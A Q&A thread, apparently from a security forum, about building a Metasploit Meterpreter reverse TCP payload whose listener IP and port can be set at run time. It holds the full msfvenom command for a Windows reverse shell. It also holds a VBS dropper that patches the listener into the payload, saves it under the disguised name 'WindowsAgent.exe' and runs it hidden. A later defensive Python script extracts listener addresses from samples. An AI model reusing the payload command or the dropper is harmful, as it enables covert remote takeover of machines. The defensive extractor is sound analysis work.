MSFvenom payload with dynamic options

0

I am using MSFvenom to export the meterpreter reverse TCP payload. While this works with msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.131 LPORT=4444 -f -exe > ~/Desktop/shell_meterpreter.exe , I would like to specify the LHOST and LPORT dynamically.

Ideally I would pass the arguments directly to the executable. For example, at the command prompt, running shell_meterpreter.exe -LHOST 192.168.6.100 -LPORT 1111 .

Does anyone know of a way to achieve this? I have tried looking through the source code but did not have much luck there.

    
asked by Gavin Youker 17.11.2017 - 06:55
source

2 answers

0

I managed to find a solution that worked for me.

I found the variables for LPORT and LHOST in the hex view of the executable (see screenshot).

In case anyone is interested, I wrote a small VBS script that splices into that hex code.

Function BuildExe(Text) 
    ' Convert the string to hex.
    Set dom = CreateObject("Microsoft.XMLDOM")
    dom.loadXML("<TtB/>")
    dom.documentElement.nodeTypedValue = Text
    dom.documentElement.dataType = "bin.hex"
    exeHex = dom.documentElement.nodeTypedValue

    ' Create the filename and filepath for the executable.
    exeFile = CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "\" & CreateObject("Scripting.FileSystemObject").GetTempName()
    CreateObject("Scripting.FileSystemObject").CreateFolder(exeFile)
    exePath = exeFile & "\" & "WindowsAgent.exe"

    ' Compile and save the executable.
    Set exeStream = CreateObject("ADODB.Stream")
    exeStream.Type = 1
    exeStream.Open
    exeStream.Write exeHex
    exeStream.SaveToFile exePath, 2

    ' Return the executable filepath.
    BuildExe = exePath
End Function

' Initialize the script.
Log "PAYLOAD", "Payload shell_meterpreter.vbs has been launched."
Execute("lib\includes\build_exe.vbs")

' Set the listener info in hex.
LPORT = Hex("4444")

octets = Split("192.168.6.131", ".")
For i = 0 To UBound(octets)
    octectTemp = Hex(octets(i))
    If Len(octectTemp) = 1 Then
        octectTemp = 0 & octectTemp
    End If

    If i = 0 Then
        LHOST = octectTemp
    Else
        LHOST = LHOST & octectTemp
    End If
Next

' Build and run Meterpreter.
exePath = BuildExe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
WScript.CreateObject("WScript.Shell").Run "cmd.exe /C start /B cmd /C " & exePath, 0, True
    
answered by Gavin Youker 18.11.2017 - 06:43
source
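From the defender's side, the same fact this answer relies on (the listener address and port sit in plain sight in the stager bytes) is what a triage script can use to pull the C2 endpoint out of a suspicious sample. The following is an added example and is not code from the original post or from Metasploit; the byte layouts assumed for the x64 and x86 reverse_tcp stagers are assumptions, and the sample bytes are constructed.

```python
"""Triage helper: find an embedded sockaddr_in (AF_INET, big-endian port,
IPv4 address) in a binary and report the LHOST/LPORT it points at."""
import re
import struct
from ipaddress import IPv4Address

# Assumed layouts (not taken from the Metasploit source):
#   x64 stager: the whole sockaddr_in is one 64-bit immediate, so the bytes
#               02 00 <port BE> <ip> appear contiguously in the file.
#   x86 stager: push <ip> ; push <family,port>, i.e. 68 <ip> 68 02 00 <port>.
PATTERNS = {
    "x64-imm64": re.compile(rb"\x02\x00(?P<port>..)(?P<ip>....)", re.DOTALL),
    "x86-push": re.compile(rb"\x68(?P<ip>....)\x68\x02\x00(?P<port>..)", re.DOTALL),
}


def extract_listeners(data: bytes):
    """Return [(offset, layout, ip, port)] for each plausible listener.

    Any '02 00' pair followed by six bytes matches the x64 pattern, so a
    real scan produces noise; all-zero ports and 0.x.x.x addresses are
    dropped here and the caller should still eyeball the rest."""
    hits = []
    for layout, pattern in PATTERNS.items():
        for m in pattern.finditer(data):
            port = struct.unpack(">H", m.group("port"))[0]  # network byte order
            ip = str(IPv4Address(m.group("ip")))
            if port == 0 or ip.startswith("0."):
                continue
            hits.append((m.start(), layout, ip, port))
    return hits


def _sockaddr(ip: str, port: int) -> bytes:
    # sin_family little-endian, sin_port big-endian, sin_addr as packed octets
    return struct.pack("<H", 2) + struct.pack(">H", port) + IPv4Address(ip).packed


# Constructed samples: a few filler bytes around the assumed stager fragments.
SAMPLE_X64 = b"\x90" * 8 + b"\x49\xbc" + _sockaddr("192.168.6.131", 4444) + b"\x41\x54"
SAMPLE_X86 = (b"\x90\x90\x68" + IPv4Address("192.168.6.131").packed
              + b"\x68\x02\x00" + struct.pack(">H", 4444) + b"\x89\xe6")

if __name__ == "__main__":
    for name, blob in (("x64", SAMPLE_X64), ("x86", SAMPLE_X86)):
        print(name, extract_listeners(blob))
```

Run it over a real sample with open(path, "rb").read() in place of the constructed blobs; the offset it reports is where a hex editor would show the listener, which is the same spot the answer above patches.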
1
msfvenom -p windows/x64/meterpreter/reverse_tcp **LHOST=192.168.x.x** LPORT=4444 -f -exe

You are using msfvenom here to generate code that gets a reverse shell on the target; you are not passing it the attacking machine's IP once it has been generated or, in your case, compiled into an executable, if that makes sense.

    
answered by Hadoken 17.11.2017 - 07:58
source
